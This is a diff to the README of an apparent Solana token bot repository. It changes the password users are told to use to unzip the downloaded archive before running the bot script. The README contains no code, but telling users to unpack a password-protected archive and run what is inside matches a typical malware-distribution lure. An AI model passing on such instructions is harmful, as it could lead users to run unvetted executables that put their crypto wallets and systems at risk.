sui-sensei/solana-token-bot/README.md

 ## Usage

 1. **Clone the repository**
-   - Clone the repository and unzip the repository with pass `x` to folder.
+   - Clone the repository and unzip the repository with pass `Zc1J8oP7` to folder.

 3. **Run the Bot:**
    - Execute the bot script.